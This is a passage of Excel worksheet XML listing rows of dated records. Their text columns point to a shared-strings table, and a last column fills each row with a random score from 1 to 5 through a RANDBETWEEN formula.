        <v>43495.41710648148</v>
      </c>
      <c r="B3344" t="s">
        <v>19</v>
      </c>
      <c r="C3344" t="s">
        <v>6</v>
      </c>
      <c r="D3344" t="s">
        <v>25</v>
      </c>
      <c r="E3344" s="2" t="s">
        <v>3258</v>
      </c>
      <c r="F3344">
        <f t="shared" ca="1" si="52"/>
        <v>2</v>
      </c>
    </row>
    <row r="3345" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A3345" s="1">
        <v>43495.410949074074</v>
      </c>
      <c r="B3345" t="s">
        <v>19</v>
      </c>
      <c r="C3345" t="s">
        <v>10</v>
      </c>
      <c r="D3345" t="s">
        <v>112</v>
      </c>
      <c r="E3345" s="2" t="s">
        <v>3259</v>
      </c>
      <c r="F3345">
        <f t="shared" ca="1" si="52"/>
        <v>3</v>
      </c>
    </row>
    <row r="3346" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A3346" s="1">
        <v>43495.399629629632</v>
      </c>
      <c r="B3346" t="s">
        <v>19</v>
      </c>
      <c r="C3346" t="s">
        <v>41</v>
      </c>
      <c r="E3346" s="2" t="s">
        <v>3260</v>
      </c>
      <c r="F3346">
        <f t="shared" ca="1" si="52"/>
        <v>1</v>
      </c>
    </row>
    <row r="3347" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A3347" s="1">
        <v>43495.396516203706</v>
      </c>
      <c r="B3347" t="s">
        <v>13</v>
      </c>
      <c r="C3347" t="s">
        <v>65</v>
      </c>
      <c r="E3347" s="2" t="s">
        <v>3261</v>
      </c>
      <c r="F3347">
        <f t="shared" ca="1" si="52"/>
        <v>5</v>
      </c>
    </row>
    <row r="3348" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3348" s="1">
        <v>43495.390497685185</v>
      </c>
      <c r="B3348" t="s">
        <v>5</v>
      </c>
      <c r="C3348" t="s">
        <v>6</v>
      </c>
      <c r="D3348" t="s">
        <v>25</v>
      </c>
      <c r="E3348" s="2" t="s">
        <v>3262</v>
      </c>
      <c r="F3348">
        <f t="shared" ca="1" si="52"/>
        <v>2</v>
      </c>
    </row>
    <row r="3349" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3349" s="1">
        <v>43495.373182870368</v>
      </c>
      <c r="B3349" t="s">
        <v>5</v>
      </c>
      <c r="C3349" t="s">
        <v>10</v>
      </c>
      <c r="D3349" t="s">
        <v>17</v>
      </c>
      <c r="E3349" t="s">
        <v>3263</v>
      </c>
      <c r="F3349">
        <f t="shared" ca="1" si="52"/>
        <v>2</v>
      </c>
    </row>
    <row r="3350" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3350" s="1">
        <v>43495.360821759263</v>
      </c>
      <c r="B3350" t="s">
        <v>19</v>
      </c>
      <c r="C3350" t="s">
        <v>6</v>
      </c>
      <c r="D3350" t="s">
        <v>194</v>
      </c>
      <c r="E3350" t="s">
        <v>3264</v>
      </c>
      <c r="F3350">
        <f t="shared" ca="1" si="52"/>
        <v>3</v>
      </c>
    </row>
    <row r="3351" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A3351" s="1">
        <v>43495.349363425928</v>
      </c>
      <c r="B3351" t="s">
        <v>13</v>
      </c>
      <c r="C3351" t="s">
        <v>10</v>
      </c>
      <c r="D3351" t="s">
        <v>271</v>
      </c>
      <c r="E3351" s="2" t="s">
        <v>3265</v>
      </c>
      <c r="F3351">
        <f t="shared" ca="1" si="52"/>
        <v>1</v>
      </c>
    </row>
    <row r="3352" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A3352" s="1">
        <v>43495.34920138889</v>
      </c>
      <c r="B3352" t="s">
        <v>5</v>
      </c>
      <c r="C3352" t="s">
        <v>344</v>
      </c>
      <c r="E3352" s="2" t="s">
        <v>3266</v>
      </c>
      <c r="F3352">
        <f t="shared" ca="1" si="52"/>
        <v>3</v>
      </c>
    </row>
    <row r="3353" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3353" s="1">
        <v>43495.338831018518</v>
      </c>
      <c r="B3353" t="s">
        <v>5</v>
      </c>
      <c r="C3353" t="s">
        <v>454</v>
      </c>
      <c r="E3353" s="2" t="s">
        <v>3267</v>
      </c>
      <c r="F3353">
        <f t="shared" ca="1" si="52"/>
        <v>4</v>
      </c>
    </row>
    <row r="3354" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3354" s="1">
        <v>43495.323391203703</v>
      </c>
      <c r="B3354" t="s">
        <v>13</v>
      </c>
      <c r="C3354" t="s">
        <v>71</v>
      </c>
      <c r="E3354" t="s">
        <v>3268</v>
      </c>
      <c r="F3354">
        <f t="shared" ca="1" si="52"/>
        <v>5</v>
      </c>
    </row>
    <row r="3355" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A3355" s="1">
        <v>43495.313391203701</v>
      </c>
      <c r="B3355" t="s">
        <v>5</v>
      </c>
      <c r="C3355" t="s">
        <v>41</v>
      </c>
      <c r="E3355" s="2" t="s">
        <v>3269</v>
      </c>
      <c r="F3355">
        <f t="shared" ca="1" si="52"/>
        <v>3</v>
      </c>
    </row>
    <row r="3356" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3356" s="1">
        <v>43495.280925925923</v>
      </c>
      <c r="B3356" t="s">
        <v>5</v>
      </c>
      <c r="C3356" t="s">
        <v>41</v>
      </c>
      <c r="E3356" t="s">
        <v>3270</v>
      </c>
      <c r="F3356">
        <f t="shared" ca="1" si="52"/>
        <v>2</v>
      </c>
    </row>
    <row r="3357" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A3357" s="1">
        <v>43495.258877314816</v>
      </c>
      <c r="B3357" t="s">
        <v>13</v>
      </c>
      <c r="C3357" t="s">
        <v>1080</v>
      </c>
      <c r="E3357" s="2" t="s">
        <v>3271</v>
      </c>
      <c r="F3357">
        <f t="shared" ca="1" si="52"/>
        <v>3</v>
      </c>
    </row>
    <row r="3358" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A3358" s="1">
        <v>43495.242546296293</v>
      </c>
      <c r="B3358" t="s">
        <v>35</v>
      </c>
      <c r="C3358" t="s">
        <v>43</v>
      </c>
      <c r="E3358" s="2" t="s">
        <v>3272</v>
      </c>
      <c r="F3358">
        <f t="shared" ca="1" si="52"/>
        <v>2</v>
      </c>
    </row>
    <row r="3359" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A3359" s="1">
        <v>43495.24150462963</v>
      </c>
      <c r="B3359" t="s">
        <v>19</v>
      </c>
      <c r="C3359" t="s">
        <v>48</v>
      </c>
      <c r="E3359" s="2" t="s">
        <v>3273</v>
      </c>
      <c r="F3359">
        <f t="shared" ca="1" si="52"/>
        <v>2</v>
      </c>
    </row>
    <row r="3360" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3360" s="1">
        <v>43495.241284722222</v>
      </c>
      <c r="B3360" t="s">
        <v>13</v>
      </c>
      <c r="C3360" t="s">
        <v>124</v>
      </c>
      <c r="E3360" t="s">
        <v>3274</v>
      </c>
      <c r="F3360">
        <f t="shared" ca="1" si="52"/>
        <v>5</v>
      </c>
    </row>
    <row r="3361" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A3361" s="1">
        <v>43495.236944444441</v>
      </c>
      <c r="B3361" t="s">
        <v>13</v>
      </c>
      <c r="C3361" t="s">
        <v>41</v>
      </c>
      <c r="E3361" s="2" t="s">
        <v>3275</v>
      </c>
      <c r="F3361">
        <f t="shared" ca="1" si="52"/>
        <v>4</v>
      </c>
    </row>
    <row r="3362" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3362" s="1">
        <v>43495.227916666663</v>
      </c>
      <c r="B3362" t="s">
        <v>19</v>
      </c>
      <c r="C3362" t="s">
        <v>41</v>
      </c>
      <c r="E3362" s="2" t="s">
        <v>3214</v>
      </c>
      <c r="F3362">
        <f t="shared" ca="1" si="52"/>
        <v>2</v>
      </c>
    </row>
    <row r="3363" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3363" s="1">
        <v>43495.221493055556</v>
      </c>
      <c r="B3363" t="s">
        <v>13</v>
      </c>
      <c r="C3363" t="s">
        <v>71</v>
      </c>
      <c r="E3363" t="s">
        <v>3276</v>
      </c>
      <c r="F3363">
        <f t="shared" ca="1" si="52"/>
        <v>2</v>
      </c>
    </row>
    <row r="3364" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A3364" s="1">
        <v>43495.197418981479</v>
      </c>
      <c r="B3364" t="s">
        <v>5</v>
      </c>
      <c r="C3364" t="s">
        <v>229</v>
      </c>
      <c r="E3364" s="2" t="s">
        <v>3277</v>
      </c>
      <c r="F3364">
        <f t="shared" ca="1" si="52"/>
        <v>5</v>
      </c>
    </row>
    <row r="3365" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A3365" s="1">
        <v>43495.18677083333</v>
      </c>
      <c r="B3365" t="s">
        <v>5</v>
      </c>
      <c r="C3365" t="s">
        <v>48</v>
      </c>
      <c r="E3365" s="2" t="s">
        <v>3278</v>
      </c>
      <c r="F3365">
        <f t="shared" ca="1" si="52"/>
        <v>2</v>
      </c>
    </row>
    <row r="3366" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A3366" s="1">
        <v>43495.161979166667</v>
      </c>
      <c r="B3366" t="s">
        <v>5</v>
      </c>
      <c r="C3366" t="s">
        <v>103</v>
      </c>
      <c r="E3366" s="2" t="s">
        <v>3279</v>
      </c>
      <c r="F3366">
        <f t="shared" ca="1" si="52"/>
        <v>1</v>
      </c>
    </row>
    <row r="3367" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3367" s="1">
        <v>43495.131354166668</v>
      </c>
      <c r="B3367" t="s">
        <v>19</v>
      </c>
      <c r="C3367" t="s">
        <v>41</v>
      </c>
      <c r="E3367" t="s">
        <v>3280</v>
      </c>
      <c r="F3367">
        <f t="shared" ca="1" si="52"/>
        <v>5</v>
      </c>
    </row>
    <row r="3368" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A3368" s="1">
        <v>43495.114895833336</v>
      </c>
      <c r="B3368" t="s">
        <v>5</v>
      </c>
      <c r="C3368" t="s">
        <v>71</v>
      </c>
      <c r="E3368" s="2" t="s">
        <v>3281</v>
      </c>
      <c r="F3368">
        <f t="shared" ca="1" si="52"/>
        <v>2</v>
      </c>
    </row>
    <row r="3369" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3369" s="1">
        <v>43495.022037037037</v>
      </c>
      <c r="B3369" t="s">
        <v>35</v>
      </c>
      <c r="C3369" t="s">
        <v>471</v>
      </c>
      <c r="D3369" t="s">
        <v>367</v>
      </c>
      <c r="E3369" t="s">
        <v>3282</v>
      </c>
      <c r="F3369">
        <f t="shared" ca="1" si="52"/>
        <v>1</v>
      </c>
    </row>
    <row r="3370" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3370" s="1">
        <v>43495.01090277778</v>
      </c>
      <c r="B3370" t="s">
        <v>1305</v>
      </c>
      <c r="C3370" t="s">
        <v>11</v>
      </c>
      <c r="E3370" s="2" t="s">
        <v>3283</v>
      </c>
      <c r="F3370">
        <f t="shared" ca="1" si="52"/>
        <v>3</v>
      </c>
    </row>
    <row r="3371" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3371" s="1">
        <v>43494.992152777777</v>
      </c>
      <c r="B3371" t="s">
        <v>13</v>
      </c>
      <c r="C3371" t="s">
        <v>41</v>
      </c>
      <c r="E3371" t="s">
        <v>3284</v>
      </c>
      <c r="F3371">
        <f t="shared" ca="1" si="52"/>
        <v>5</v>
      </c>
    </row>
    <row r="3372" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A3372" s="1">
        <v>43494.992152777777</v>
      </c>
      <c r="B3372" t="s">
        <v>5</v>
      </c>
      <c r="C3372" t="s">
        <v>10</v>
      </c>
      <c r="D3372" t="s">
        <v>6</v>
      </c>
      <c r="E3372" s="2" t="s">
        <v>3285</v>
      </c>
      <c r="F3372">
        <f t="shared" ca="1" si="52"/>
        <v>1</v>
      </c>
    </row>
    <row r="3373" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A3373" s="1">
        <v>43494.939386574071</v>
      </c>
      <c r="B3373" t="s">
        <v>35</v>
      </c>
      <c r="C3373" t="s">
        <v>10</v>
      </c>
      <c r="D3373" t="s">
        <v>178</v>
      </c>
      <c r="E3373" s="2" t="s">
        <v>3286</v>
      </c>
      <c r="F3373">
        <f t="shared" ca="1" si="52"/>
        <v>4</v>
      </c>
    </row>
    <row r="3374" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3374" s="1">
        <v>43494.867627314816</v>
      </c>
      <c r="B3374" t="s">
        <v>19</v>
      </c>
      <c r="C3374" t="s">
        <v>10</v>
      </c>
      <c r="D3374" t="s">
        <v>11</v>
      </c>
      <c r="E3374" t="s">
        <v>3287</v>
      </c>
      <c r="F3374">
        <f t="shared" ca="1" si="52"/>
        <v>4</v>
      </c>
    </row>
    <row r="3375" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3375" s="1">
        <v>43494.838240740741</v>
      </c>
      <c r="B3375" t="s">
        <v>13</v>
      </c>
      <c r="C3375" t="s">
        <v>10</v>
      </c>
      <c r="D3375" t="s">
        <v>89</v>
      </c>
      <c r="E3375" t="s">
        <v>3288</v>
      </c>
      <c r="F3375">
        <f t="shared" ca="1" si="52"/>
        <v>3</v>
      </c>
    </row>
    <row r="3376" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3376" s="1">
        <v>43494.762326388889</v>
      </c>
      <c r="B3376" t="s">
        <v>19</v>
      </c>
      <c r="C3376" t="s">
        <v>10</v>
      </c>
      <c r="D3376" t="s">
        <v>6</v>
      </c>
      <c r="E3376" t="s">
        <v>3289</v>
      </c>
      <c r="F3376">
        <f t="shared" ca="1" si="52"/>
        <v>3</v>
      </c>
    </row>
    <row r="3377" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3377" s="1">
        <v>43494.751331018517</v>
      </c>
      <c r="B3377" t="s">
        <v>5</v>
      </c>
      <c r="C3377" t="s">
        <v>10</v>
      </c>
      <c r="D3377" t="s">
        <v>6</v>
      </c>
      <c r="E3377" t="s">
        <v>3290</v>
      </c>
      <c r="F3377">
        <f t="shared" ca="1" si="52"/>
        <v>3</v>
      </c>
    </row>
    <row r="3378" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3378" s="1">
        <v>43494.740891203706</v>
      </c>
      <c r="B3378" t="s">
        <v>5</v>
      </c>
      <c r="C3378" t="s">
        <v>16</v>
      </c>
      <c r="E3378" t="s">
        <v>3291</v>
      </c>
      <c r="F3378">
        <f t="shared" ca="1" si="52"/>
        <v>1</v>
      </c>
    </row>
    <row r="3379" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3379" s="1">
        <v>43494.728101851855</v>
      </c>
      <c r="B3379" t="s">
        <v>13</v>
      </c>
      <c r="C3379" t="s">
        <v>253</v>
      </c>
      <c r="E3379" t="s">
        <v>3292</v>
      </c>
      <c r="F3379">
        <f t="shared" ca="1" si="52"/>
        <v>3</v>
      </c>
    </row>
    <row r="3380" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3380" s="1">
        <v>43494.715983796297</v>
      </c>
      <c r="B3380" t="s">
        <v>13</v>
      </c>
      <c r="C3380" t="s">
        <v>10</v>
      </c>
      <c r="D3380" t="s">
        <v>89</v>
      </c>
      <c r="E3380" s="2" t="s">
        <v>3293</v>
      </c>
      <c r="F3380">
        <f t="shared" ca="1" si="52"/>
        <v>2</v>
      </c>
    </row>
    <row r="3381" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3381" s="1">
        <v>43494.686469907407</v>
      </c>
      <c r="B3381" t="s">
        <v>13</v>
      </c>
      <c r="C3381" t="s">
        <v>258</v>
      </c>
      <c r="E3381" s="2" t="s">
        <v>3294</v>
      </c>
      <c r="F3381">
        <f t="shared" ca="1" si="52"/>
        <v>5</v>
      </c>
    </row>
    <row r="3382" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3382" s="1">
        <v>43494.678819444445</v>
      </c>
      <c r="B3382" t="s">
        <v>13</v>
      </c>
      <c r="C3382" t="s">
        <v>10</v>
      </c>
      <c r="D3382" t="s">
        <v>667</v>
      </c>
      <c r="E3382" t="s">
        <v>3295</v>
      </c>
      <c r="F3382">
        <f t="shared" ca="1" si="52"/>
        <v>2</v>
      </c>
    </row>
    <row r="3383" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3383" s="1">
        <v>43494.665972222225</v>
      </c>
      <c r="B3383" t="s">
        <v>1305</v>
      </c>
      <c r="C3383" t="s">
        <v>10</v>
      </c>
      <c r="D3383" t="s">
        <v>192</v>
      </c>
      <c r="E3383" s="2" t="s">
        <v>3296</v>
      </c>
      <c r="F3383">
        <f t="shared" ca="1" si="52"/>
        <v>5</v>
      </c>
    </row>
    <row r="3384" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3384" s="1">
        <v>43494.662268518521</v>
      </c>
      <c r="B3384" t="s">
        <v>13</v>
      </c>
      <c r="C3384" t="s">
        <v>10</v>
      </c>
      <c r="D3384" t="s">
        <v>36</v>
      </c>
      <c r="E3384" t="s">
        <v>3297</v>
      </c>
      <c r="F3384">
        <f t="shared" ca="1" si="52"/>
        <v>3</v>
      </c>
    </row>
    <row r="3385" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3385" s="1">
        <v>43494.654733796298</v>
      </c>
      <c r="B3385" t="s">
        <v>13</v>
      </c>
      <c r="C3385" t="s">
        <v>10</v>
      </c>
      <c r="D3385" t="s">
        <v>6</v>
      </c>
      <c r="E3385" t="s">
        <v>3298</v>
      </c>
      <c r="F3385">
        <f t="shared" ca="1" si="52"/>
        <v>5</v>
      </c>
    </row>
    <row r="3386" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3386" s="1">
        <v>43494.654085648152</v>
      </c>
      <c r="B3386" t="s">
        <v>19</v>
      </c>
      <c r="C3386" t="s">
        <v>10</v>
      </c>
      <c r="D3386" t="s">
        <v>6</v>
      </c>
      <c r="E3386" t="s">
        <v>3299</v>
      </c>
      <c r="F3386">
        <f t="shared" ca="1" si="52"/>
        <v>1</v>
      </c>
    </row>
    <row r="3387" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3387" s="1">
        <v>43494.641076388885</v>
      </c>
      <c r="B3387" t="s">
        <v>13</v>
      </c>
      <c r="C3387" t="s">
        <v>10</v>
      </c>
      <c r="D3387" t="s">
        <v>36</v>
      </c>
      <c r="E3387" t="s">
        <v>3300</v>
      </c>
      <c r="F3387">
        <f t="shared" ca="1" si="52"/>
        <v>3</v>
      </c>
    </row>
    <row r="3388" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A3388" s="1">
        <v>43494.613796296297</v>
      </c>
      <c r="B3388" t="s">
        <v>13</v>
      </c>
      <c r="C3388" t="s">
        <v>6</v>
      </c>
      <c r="D3388" t="s">
        <v>194</v>
      </c>
      <c r="E3388" s="2" t="s">
        <v>3301</v>
      </c>
      <c r="F3388">
        <f t="shared" ca="1" si="52"/>
        <v>4</v>
      </c>
    </row>
    <row r="3389" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3389" s="1">
        <v>43494.613252314812</v>
      </c>
      <c r="B3389" t="s">
        <v>5</v>
      </c>
      <c r="C3389" t="s">
        <v>48</v>
      </c>
      <c r="E3389" t="s">
        <v>3302</v>
      </c>
      <c r="F3389">
        <f t="shared" ca="1" si="52"/>
        <v>3</v>
      </c>
    </row>
    <row r="3390" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3390" s="1">
        <v>43494.611990740741</v>
      </c>
      <c r="B3390" t="s">
        <v>13</v>
      </c>
      <c r="C3390" t="s">
        <v>10</v>
      </c>
      <c r="D3390" t="s">
        <v>112</v>
      </c>
      <c r="E3390" t="s">
        <v>3303</v>
      </c>
      <c r="F3390">
        <f t="shared" ca="1" si="52"/>
        <v>3</v>
      </c>
    </row>
    <row r="3391" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3391" s="1">
        <v>43494.603379629632</v>
      </c>
      <c r="B3391" t="s">
        <v>5</v>
      </c>
      <c r="C3391" t="s">
        <v>10</v>
      </c>
      <c r="D3391" t="s">
        <v>36</v>
      </c>
      <c r="E3391" t="s">
        <v>3304</v>
      </c>
      <c r="F3391">
        <f t="shared" ca="1" si="52"/>
        <v>5</v>
      </c>
    </row>
    <row r="3392" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3392" s="1">
        <v>43494.596250000002</v>
      </c>
      <c r="B3392" t="s">
        <v>19</v>
      </c>
      <c r="C3392" t="s">
        <v>2452</v>
      </c>
      <c r="D3392" t="s">
        <v>494</v>
      </c>
      <c r="E3392" t="s">
        <v>3305</v>
      </c>
      <c r="F3392">
        <f t="shared" ca="1" si="52"/>
        <v>4</v>
      </c>
    </row>
    <row r="3393" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3393" s="1">
        <v>43494.592719907407</v>
      </c>
      <c r="B3393" t="s">
        <v>19</v>
      </c>
      <c r="C3393" t="s">
        <v>10</v>
      </c>
      <c r="D3393" t="s">
        <v>178</v>
      </c>
      <c r="E3393" t="s">
        <v>3306</v>
      </c>
      <c r="F3393">
        <f t="shared" ca="1" si="52"/>
        <v>3</v>
      </c>
    </row>
    <row r="3394" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3394" s="1">
        <v>43494.552048611113</v>
      </c>
      <c r="B3394" t="s">
        <v>19</v>
      </c>
      <c r="C3394" t="s">
        <v>10</v>
      </c>
      <c r="D3394" t="s">
        <v>20</v>
      </c>
      <c r="E3394" t="s">
        <v>3307</v>
      </c>
      <c r="F3394">
        <f t="shared" ref="F3394:F3457" ca="1" si="53">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="3395" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3395" s="1">
        <v>43494.528657407405</v>
      </c>
      <c r="B3395" t="s">
        <v>5</v>
      </c>
      <c r="C3395" t="s">
        <v>10</v>
      </c>
      <c r="D3395" t="s">
        <v>17</v>
      </c>
      <c r="E3395" t="s">
        <v>3308</v>
      </c>
      <c r="F3395">
        <f t="shared" ca="1" si="53"/>
        <v>5</v>
      </c>
    </row>
    <row r="3396" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3396" s="1">
        <v>43494.527418981481</v>
      </c>
      <c r="B3396" t="s">
        <v>13</v>
      </c>
      <c r="C3396" t="s">
        <v>10</v>
      </c>
      <c r="D3396" t="s">
        <v>52</v>
      </c>
      <c r="E3396" t="s">
        <v>3309</v>
      </c>
      <c r="F3396">
        <f t="shared" ca="1" si="53"/>
        <v>1</v>
      </c>
    </row>
    <row r="3397" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A3397" s="1">
        <v>43494.51662037037</v>
      </c>
      <c r="B3397" t="s">
        <v>5</v>
      </c>
      <c r="C3397" t="s">
        <v>65</v>
      </c>
      <c r="E3397" s="2" t="s">
        <v>3310</v>
      </c>
      <c r="F3397">
        <f t="shared" ca="1" si="53"/>
        <v>4</v>
      </c>
    </row>
    <row r="3398" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3398" s="1">
        <v>43494.507013888891</v>
      </c>
      <c r="B3398" t="s">
        <v>13</v>
      </c>
      <c r="C3398" t="s">
        <v>10</v>
      </c>
      <c r="D3398" t="s">
        <v>11</v>
      </c>
      <c r="E3398" t="s">
        <v>3311</v>
      </c>
      <c r="F3398">
        <f t="shared" ca="1" si="53"/>
        <v>3</v>
      </c>
    </row>
    <row r="3399" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3399" s="1">
        <v>43494.500590277778</v>
      </c>
      <c r="B3399" t="s">
        <v>13</v>
      </c>
      <c r="C3399" t="s">
        <v>10</v>
      </c>
      <c r="D3399" t="s">
        <v>112</v>
      </c>
      <c r="E3399" t="s">
        <v>3312</v>
      </c>
      <c r="F3399">
        <f t="shared" ca="1" si="53"/>
        <v>3</v>
      </c>
    </row>
    <row r="3400" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3400" s="1">
        <v>43494.498483796298</v>
      </c>
      <c r="B3400" t="s">
        <v>13</v>
      </c>
      <c r="C3400" t="s">
        <v>10</v>
      </c>
      <c r="D3400" t="s">
        <v>17</v>
      </c>
      <c r="E3400" t="s">
        <v>3313</v>
      </c>
      <c r="F3400">
        <f t="shared" ca="1" si="53"/>
        <v>3</v>
      </c>
    </row>
    <row r="3401" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3401" s="1">
        <v>43494.479872685188</v>
      </c>
      <c r="B3401" t="s">
        <v>19</v>
      </c>
      <c r="C3401" t="s">
        <v>10</v>
      </c>
      <c r="D3401" t="s">
        <v>86</v>
      </c>
      <c r="E3401" t="s">
        <v>3314</v>
      </c>
      <c r="F3401">
        <f t="shared" ca="1" si="53"/>
        <v>5</v>
      </c>
    </row>
    <row r="3402" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3402" s="1">
        <v>43494.478043981479</v>
      </c>
      <c r="B3402" t="s">
        <v>19</v>
      </c>
      <c r="C3402" t="s">
        <v>10</v>
      </c>
      <c r="D3402" t="s">
        <v>263</v>
      </c>
      <c r="E3402" t="s">
        <v>3315</v>
      </c>
      <c r="F3402">
        <f t="shared" ca="1" si="53"/>
        <v>1</v>
      </c>
    </row>
    <row r="3403" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3403" s="1">
        <v>43494.4684837963</v>
      </c>
      <c r="B3403" t="s">
        <v>13</v>
      </c>
      <c r="C3403" t="s">
        <v>10</v>
      </c>
      <c r="D3403" t="s">
        <v>89</v>
      </c>
      <c r="E3403" t="s">
        <v>3316</v>
      </c>
      <c r="F3403">
        <f t="shared" ca="1" si="53"/>
        <v>5</v>
      </c>
    </row>
    <row r="3404" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3404" s="1">
        <v>43494.462754629632</v>
      </c>
      <c r="B3404" t="s">
        <v>5</v>
      </c>
      <c r="C3404" t="s">
        <v>10</v>
      </c>
      <c r="D3404" t="s">
        <v>56</v>
      </c>
      <c r="E3404" t="s">
        <v>3317</v>
      </c>
      <c r="F3404">
        <f t="shared" ca="1" si="53"/>
        <v>1</v>
      </c>
    </row>
    <row r="3405" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A3405" s="1">
        <v>43494.461851851855</v>
      </c>
      <c r="B3405" t="s">
        <v>19</v>
      </c>
      <c r="C3405" t="s">
        <v>559</v>
      </c>
      <c r="E3405" s="2" t="s">
        <v>3318</v>
      </c>
      <c r="F3405">
        <f t="shared" ca="1" si="53"/>
        <v>3</v>
      </c>
    </row>
    <row r="3406" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3406" s="1">
        <v>43494.456006944441</v>
      </c>
      <c r="B3406" t="s">
        <v>5</v>
      </c>
      <c r="C3406" t="s">
        <v>82</v>
      </c>
      <c r="E3406" t="s">
        <v>3319</v>
      </c>
      <c r="F3406">
        <f t="shared" ca="1" si="53"/>
        <v>3</v>
      </c>
    </row>
    <row r="3407" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3407" s="1">
        <v>43494.451122685183</v>
      </c>
      <c r="B3407" t="s">
        <v>5</v>
      </c>
      <c r="C3407" t="s">
        <v>124</v>
      </c>
      <c r="E3407" s="2" t="s">
        <v>3320</v>
      </c>
      <c r="F3407">
        <f t="shared" ca="1" si="53"/>
        <v>4</v>
      </c>
    </row>
    <row r="3408" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3408" s="1">
        <v>43494.442731481482</v>
      </c>
      <c r="B3408" t="s">
        <v>1305</v>
      </c>
      <c r="C3408" t="s">
        <v>10</v>
      </c>
      <c r="D3408" t="s">
        <v>89</v>
      </c>
      <c r="E3408" s="2" t="s">
        <v>3321</v>
      </c>
      <c r="F3408">
        <f t="shared" ca="1" si="53"/>
        <v>3</v>
      </c>
    </row>
    <row r="3409" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3409" s="1">
        <v>43494.435474537036</v>
      </c>
      <c r="B3409" t="s">
        <v>13</v>
      </c>
      <c r="C3409" t="s">
        <v>1931</v>
      </c>
      <c r="E3409" t="s">
        <v>3322</v>
      </c>
      <c r="F3409">
        <f t="shared" ca="1" si="53"/>
        <v>2</v>
      </c>
    </row>
    <row r="3410" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3410" s="1">
        <v>43494.43546296296</v>
      </c>
      <c r="B3410" t="s">
        <v>13</v>
      </c>
      <c r="C3410" t="s">
        <v>10</v>
      </c>
      <c r="D3410" t="s">
        <v>89</v>
      </c>
      <c r="F3410">
        <f t="shared" ca="1" si="53"/>
        <v>4</v>
      </c>
    </row>
    <row r="3411" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3411" s="1">
        <v>43494.433391203704</v>
      </c>
      <c r="B3411" t="s">
        <v>19</v>
      </c>
      <c r="C3411" t="s">
        <v>290</v>
      </c>
      <c r="E3411" t="s">
        <v>3323</v>
      </c>
      <c r="F3411">
        <f t="shared" ca="1" si="53"/>
        <v>5</v>
      </c>
    </row>
    <row r="3412" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3412" s="1">
        <v>43494.430115740739</v>
      </c>
      <c r="B3412" t="s">
        <v>19</v>
      </c>
      <c r="C3412" t="s">
        <v>10</v>
      </c>
      <c r="D3412" t="s">
        <v>158</v>
      </c>
      <c r="E3412" t="s">
        <v>3324</v>
      </c>
      <c r="F3412">
        <f t="shared" ca="1" si="53"/>
        <v>4</v>
